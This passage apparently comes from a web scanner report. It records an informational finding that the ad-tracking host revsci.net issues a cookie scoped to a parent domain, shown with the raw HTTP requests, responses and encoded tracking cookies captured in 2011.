Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_BYLc="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolr+FQFsP4qAsRpDY+d3v4x1sEDE+ue/ihtvjfvgsjZQyGEfqKf9OTHEbPpAc8e2VDA3Fy31gPZUZAJ5sTqWaE97/6FPY2NufszctJYIDjVFtpyQp6CIElunP5/Fjbch0psAza3lQsbeuTLBQZfnYR5Vm2zcnttTaQ3RRUGknJsHdZ2YTGmaZEpUPVfR5WEH8qQzcpnYeDrJAn1U1buygJAgpsWhbrbPB62kbK9yKfQZIMoHovzAcyzOFwV3o882c37Vo38T8K7U52pVQNvzLxj/uGFviLERC8sca4eAi61DiNEDTqM/IN8DsXtKtjPIKnNdkUzR4iALYlRHtu6IzzgHAfpfiR0SZ+Qu5uI5tZo9DKQbofAsfAokbZG9v+8yN9GytIA4gk/rOowK4Z9oL0CNELZAhszQQvY6FF/3L+trORXCGDkE0RN/2x0V8S/EDst+ldkzRbm7ZPRh0uZF5w5KN6rOvpcjfhM6R0VXjn4no7zmfW/8wkl1Sr90JpQkbE/IqBbyYvNOD6LP48UAeJqqNoUv8J15ZhT5JVWOlzRdmgHjHKKUZkcdnSqvH6OywThgz3CIh8/Obpsusmj27DHBOmdbuNFwEcyxmG/ds+SjsmRrWqkDUtHLSfKzo2ofd32/Hsrq4sY4zILJjKL5J7IMLRCxiiwWtbor9fcCciEv1pcT5nTNBTNkHxrdpuwl9briEooxWPCqFK2jkoJAdl2KBZV0uEyYntNyN4tJh1RPlIAJQ5SA3Os+e1IWSNEQz7fcGo/JkapEB3iOjdbSAfW+usL7RRtzlg5IpZneDUPmNUJlRz119ioNxLVNN5D2uMpFPiqXHr7MGb6Unm11CU3DcIT4P6CDoohRwvTmGnBO1UxP31egFnTsz1jp7VQWEpKP/jBWEIJ0A1Bq/ilazcW/mTHXVBfxfs9QIt53wuzdjZYMMikbSRiA8j1hlmUMuiplRzSe+VvL4O+T8DmwiPy4jkUHIUTlo1hwJkMn/XFl2E9Do781hiFisQED/kvhlSQ2QOal1oEjlaq6/KeBEGHFwUdh3G+Uhsi2wZC1+LqxIpiNR1kDLkLMzqmcUdhr4irFOOCT0Q2D7VsXRDjcR3Rc/wBXtUvlX51mp6gsC2t4YDQx70JGW0jU0HUQm8JDYVTB6LY2Ollf6H3aEOFaWYvW6lDMGrqfVho6JHblV7YIXULd5dUQvRc0DCpykomf9tkGzNn43cKQzNhG14LW+OADiNr7oTqK1iUFY3s0+1z4dKVm6XyypxZlZkviVcn9/ysd9NcKbcC7Ftkj6Y4ojL6Z778T1adInCzfpw=="; rsi_us_1000000="pUMN4y+jOBYULQE0ur9TT2hzHlCu5XJb+xXy6/x3L5MD3MEadA+jQxIrfBzwzrIW0ureJ25b5YehdOhfLDxU705cIFGcmpbl76qyAEMxXfX8x6Xcpot+fp/bLmulVHQV/sS/hZpV/BiAufdCqnSgpWZYN/U3VM2aQVzgr4gWRAhn1BlMljPfLOucC3CKejLQux0iTU8TlKGPYPHHIaLifzoQ0dcaYs/U7ZoG6HJ4FQqSrtbA66B9kFtE1P8TDUhepkEnqHV/9IdFG/JEyQ/UEF0QCB0BEG3a9uTX3CcK62OyljHrrScn9vd51iqfuwB9lCDChbcFXz+WxPXuCqNuPbkygz4tmNkZO25SZMZWaMRkEyJ/9luf2te0/du4eEWtieXpjJNURgFdfGFIZdzND9s9skCKJZQyafJGqXBBYXMPVwE2ZleDXBWPvRgOqqH9EvHBiNx4Kh1l0Q3QJcTlpGN2v7vbdkgZFWvukjFrPXDqXZNW2X8vT3C4quRaTu9pk4wnRGpKqqDDcZhTqm1txbnKTc262p7SI32tKRDNFMaxhYxVcI7bMzrH93pqUpsIp6QxSrjdrHQgs8YUJCIRRMMMjJP13Xu2JCZakMvJ6QV11uk0p0o2YHgKZOGAM0+t+Ahw9OSqG1qiOH8dL/tJU2Kz+XW6cIp11vrGdY/TB/Sp9trPbqnLiuN+6RDNM47hD7sMpLvBwkmVKaMxLYuK+Z6En1APpJtu4wVYF2sjpczELMEmA54MAMrEO79ISvFyJGbwrJ0ZqgardDX6vRHNuQZWRbawgLYmJccd9iGQXnNrALh3E7VbTyT9rFknOQxAEOvASjXHAtopelimeUoFwM/23dcKcsUsb2PXBecTuF7c3UA9MZGvdJ9gZJCqUW4hAWPhRGZZaZfyUkkUr5UdBiBlLI7NWaebk65a1YoihhRSFxW65ZZB0x5GKXJK1sWDr1sg2nlNw7qzsouFlwV0ccv023CDzNZTyrQrV/Gg+ga5XGrPRnAQXj1xYX2Kpmv/aH28I588UF7lLcWJHXuvpbQs6qk0sGGCL2Qm2G7jocOOpBPUBUB2HhPc31J7OThksnfG6M3RiPtJLoOYijblPmAZrvY0Qdi4zlMfultIAHCDNhuFJfyzXbHypfSE8KVPphbKpXLXQOeRyi0G443mYrlVWYqxG6vF+WIFoeH5uCSdTsQbKSROnvDcuvG7BvdGr3NhULTzVRPfpUL+m6avhDIBJMZyVvJMBPjg0Cdaan97UbFuBI6cUd2ogoCk7JNAeyqARjl5aOunuFClLrTGDQRl3MnkbleJ8ITAKYHNJl2GBzuItoQioOZoVtGZQgVhuwK8pY+z8DkUFW1ok09IboJE+48RN1RRRlGId3YgygsdV1zV0EzCGuxqwwojOpfaVmLcjXif6lbYAD1iNXvwuyDJ9sd/rAVIa1UQUQZgo4nO/R9H9myEBOgzxaRd3EyIlv0OVPWui12vquSDoJkHkj/YJ3BST6YNVAcDXnEfzIBa3IAkh6Kvb2zfF8VpwPFUyz8KzuXDHtcugSUzgpVUIfBmksylXzod3OXlR8eDnEYDqdbKdMa3M4uc8uIxnCyDADJt8ImHW9CvELFOSCwLZrXk4LrFMTNWU+ucZmUO9HPGg0AC10QYsAIt9ngjxgy/JUoSc5QUEEbeXPt/NPFHDlR7ELECtqwSsCx4L0BhXTN8SIfRnb4auARTIv9gyBWdxBTqZr70RQmrpOXuOzsmvo5YnuHCCvDCa7zByRLsWZMmyv1kCz0t5TQOX6INZBJ5q5AReA=="; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05S6hScUZY7jk9D/Y8sdnlHP/5/LhztKuWrz1dEPG5Xt07bm2Mr9ewY2PdAJgSNEMnWDMpRCe+ILKUYPyEmX48AGeMJ/8EoB1+U3gk5WVvu0gC8SIr1cxZD6ODH2vivKPGV9m3O2z1pYNIuFGQpkIZx0ZFXv/oUdXx1+hQFPbRtkGUDxXUi6CBi64g+YpZpA2k/FgE6FJQ4ZVNNE=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNx6sMzbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbbpeqt1vpEp6PLPFjL00+eBCs6WjLf8zGKgiUktukxMj4LRehjtnrXATA7TZkMbfKjMiLMeNEEm/UfgxIQJtqpQYP/DuRMuCpad6JLNu5xR3q3Nz7Qafk8Wq0LRKXPXAPmKuDfSqNAA52IOTTmAVH8tD0S/YdoWswmaiEBbSz+MwOgD397VGeNFH/TE83MuTYCsr8SOCGmMmVMB6h97ZyxIjBb8MzzuEcOlvCO74c+w4v5CS/NhtPQjnhWFjRE2bGoLNZc0rW2//D6vang55J1GgLZQ6jMWccaEAMvC+smP1f1HkrEbSdzNqMIm1KKdwD840D4c7y3R4hj5u/GQ56eVSwG/SVRdfTdU7/8J9cyK4i587brnOIJfC42UX87URuVyUdQmf+VhpUrQ+FcB2ySMYhO2SOJ36YEeivt82Deapbp+4snD8JZgyt6tgd7D7qFfWLJUvk3U7uuprSNn4w==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:15:17 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:15:17 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.150. http://pix04.revsci.net/I10985/b3/0/3/1008211/35234473.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/35234473.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNhqsMzbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCbbpen5bmxx0VW/Fj5TEabvOAJFHZ1HkqHXXxqnjiC3oOweMZPLlJc8T19VoEG91R/79+lt4fZilDrszXU7mdAMjFIkIYxMQCSNyifbqIhvmfRHQ/bfPEmoxjG9KsFrlIFpqF0DOsPBltx7T6Ls9mCUpsrdHAlqV622l96+o10Ip9jbnCOxhY2O+6BBt79v61ZquiPu+e8/TqC8ufzKjWyLX+CkGA7hBRd4KqxbK4GR3kr10P1alTxuIdxjE/vbgXj273xLQtFoAuMgvhXM+gRZosHNtdBlyI9PehcinFhTPHvJybV7PKGo2x/wdWBIATm7BeR5l66J4IED/xpidjbkw2u1kTEZnZn9WBtlgoahVnyL84qaA73tC4HvMP6AIXggyvgrmsWzt6IKQdWUHX7AMC8hesN6xhqUk6yK6Tj++FJJtKzuEVSP4KgLXeJZ+4qcJhmo3tTD2Dn1cvueINMs=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:13:18 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/35234473.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; 